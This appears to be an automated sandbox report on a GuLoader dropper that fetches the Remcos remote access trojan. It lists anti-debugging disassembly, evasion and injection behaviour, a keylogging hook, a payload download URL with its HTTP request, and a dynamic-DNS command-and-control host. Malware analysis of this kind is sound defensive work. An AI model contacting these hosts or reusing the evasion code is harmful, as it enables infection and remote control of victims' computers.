Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 000000000056734C second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC46130Eh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000568236 second address: 0000000000568261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC9FAF65h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000567D0C second address: 0000000000567D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC46132Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC461409h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC46130Ah 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC46136Ch 0x00000062 call 00007F7AFC46134Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC461409h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000567E99 second address: 0000000000567E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC9FB65Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC9FB141h 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000562D9E second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ebx 0x00000004 cmp bx, cx 0x00000007 mov ebx, dword ptr [ebp+000001E5h] 0x0000000d mov dword ptr [ebp+0000023Eh], edi 0x00000013 mov edi, ebx 0x00000015 push edi 0x00000016 mov edi, dword ptr [ebp+0000023Eh] 0x0000001c test cx, ax 0x0000001f mov dword ptr [ebp+00000277h], ecx 0x00000025 mov ecx, edi 0x00000027 push ecx 0x00000028 cmp bx, cx 0x0000002b mov ecx, dword ptr [ebp+00000277h] 0x00000031 call 00007F7AFC465881h 0x00000036 mov ecx, dword ptr [esp+0Ch] 0x0000003a mov edx, dword ptr [esp+08h] 0x0000003e mov ebx, dword ptr [esp+04h] 0x00000042 test ecx, ecx 0x00000044 je 00007F7AFC461338h 0x00000046 test eax, ecx 0x00000048 mov al, byte ptr [edx] 0x0000004a mov byte ptr [ebx], al 0x0000004c pushad 0x0000004d mov ecx, 00000009h 0x00000052 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F8680 rdtsc

1_2_020F8680

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Window / User API: threadDelayed 9146			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Window / User API: foregroundWindowGot 461			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408	Thread sleep count: 9146 > 30			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408	Thread sleep time: -45730s >= -30000s			Jump to behavior

Sleep loop found (likely to delay execution)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Thread sleep count: Count: 9146 delay: -5

Jump to behavior

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F8680 rdtsc

1_2_020F8680

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F6562 LdrInitializeThunk,

1_2_020F6562

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8680 mov eax, dword ptr fs:[00000030h]	1_2_020F8680
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5461 mov eax, dword ptr fs:[00000030h]	1_2_020F5461
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F78E2 mov eax, dword ptr fs:[00000030h]	1_2_020F78E2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2CF2 mov eax, dword ptr fs:[00000030h]	1_2_020F2CF2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F735B mov eax, dword ptr fs:[00000030h]	1_2_020F735B
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F37D8 mov eax, dword ptr fs:[00000030h]	1_2_020F37D8

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'

Jump to behavior

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: logs.dat.13.dr	Binary or memory string: [ Program Manager ]
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_00401A45 cpuid

1_2_00401A45

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

Contacted Domains

Name	IP	Active
wealthyrem.ddns.net	194.5.97.128	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://101.99.94.119/WEALTH_PRUuqVZw139.bin^	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin^"}

Multi AV Scanner detection for submitted file

Source: LzbZ4T1iV8.exe	Virustotal: Detection: 17%			Perma Link
Source: LzbZ4T1iV8.exe	ReversingLabs: Detection: 17%

Yara detected Remcos RAT

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Machine Learning detection for sample

Source: LzbZ4T1iV8.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: LzbZ4T1iV8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUuqVZw139.bin^

Uses dynamic DNS services

Source: unknown

DNS query: name: wealthyrem.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49767 -> 194.5.97.128:39200

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\LzbZ4T1iV8.exe

Jump to behavior

E-Banking Fraud:

Yara detected Remcos RAT

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Process Stats: CPU usage > 98%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F588C NtAllocateVirtualMemory,	1_2_020F588C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA NtWriteVirtualMemory,	1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8FC4 NtProtectVirtualMemory,	1_2_020F8FC4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,	1_2_020F0BEF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93EC NtResumeThread,	1_2_020F93EC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F4C19 NtWriteVirtualMemory,	1_2_020F4C19
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EA4 NtWriteVirtualMemory,	1_2_020F7EA4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F42C4 NtWriteVirtualMemory,	1_2_020F42C4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F58FA NtAllocateVirtualMemory,	1_2_020F58FA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F474F NtWriteVirtualMemory,	1_2_020F474F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F43A8 NtWriteVirtualMemory,	1_2_020F43A8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F61C5 NtWriteVirtualMemory,	1_2_020F61C5
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93FB NtResumeThread,	1_2_020F93FB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569B42 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_00569B42
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569C0E LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_00569C0E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569B3D TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_00569B3D

Detected potential crypto function

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404478	1_2_00404478
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404418	1_2_00404418
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404834	1_2_00404834
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004036F0	1_2_004036F0
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004034F4	1_2_004034F4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00403488	1_2_00403488
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004046B4	1_2_004046B4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404774	1_2_00404774
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404534	1_2_00404534
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004045F4	1_2_004045F4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004035B2	1_2_004035B2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004043B8	1_2_004043B8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8680	1_2_020F8680
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0567	1_2_020F0567
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA	1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF	1_2_020F0BEF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93EC	1_2_020F93EC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F4C19	1_2_020F4C19
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F424C	1_2_020F424C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8A4B	1_2_020F8A4B
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3C48	1_2_020F3C48
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0E55	1_2_020F0E55
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8C67	1_2_020F8C67
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F9E67	1_2_020F9E67
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1060	1_2_020F1060
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0E7A	1_2_020F0E7A
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1070	1_2_020F1070
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0C8E	1_2_020F0C8E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F808E	1_2_020F808E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F249F	1_2_020F249F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2899	1_2_020F2899
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EA4	1_2_020F7EA4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F56A3	1_2_020F56A3
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2EA2	1_2_020F2EA2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F14C6	1_2_020F14C6
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F42C4	1_2_020F42C4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F20C0	1_2_020F20C0
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7AD9	1_2_020F7AD9
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F10EB	1_2_020F10EB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EE6	1_2_020F7EE6
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F20FE	1_2_020F20FE
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2CF2	1_2_020F2CF2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3912	1_2_020F3912
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5D10	1_2_020F5D10
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7F34	1_2_020F7F34
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F474F	1_2_020F474F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F154C	1_2_020F154C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5D5D	1_2_020F5D5D
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0B55	1_2_020F0B55
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1D68	1_2_020F1D68
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1D73	1_2_020F1D73
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F43A8	1_2_020F43A8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3FBC	1_2_020F3FBC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F61C5	1_2_020F61C5
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F37D8	1_2_020F37D8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BD2	1_2_020F0BD2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F77FF	1_2_020F77FF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F89FD	1_2_020F89FD
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93FB	1_2_020F93FB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F87FA	1_2_020F87FA

PE file contains strange resources

Source: LzbZ4T1iV8.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LzbZ4T1iV8.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: LzbZ4T1iV8.exe, 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1721652241.000000001DD60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe, 0000000D.00000000.861623499.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe

Uses 32bit PE files

Source: LzbZ4T1iV8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/2

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7C81C95CE370506E.TMP

Jump to behavior

Source: LzbZ4T1iV8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: LzbZ4T1iV8.exe	Virustotal: Detection: 17%
Source: LzbZ4T1iV8.exe	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'	Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004018D2 push fs; retf	1_2_004018D4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F662F push cs; iretd	1_2_020F6630
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F003D push esp; iretd	1_2_020F003E
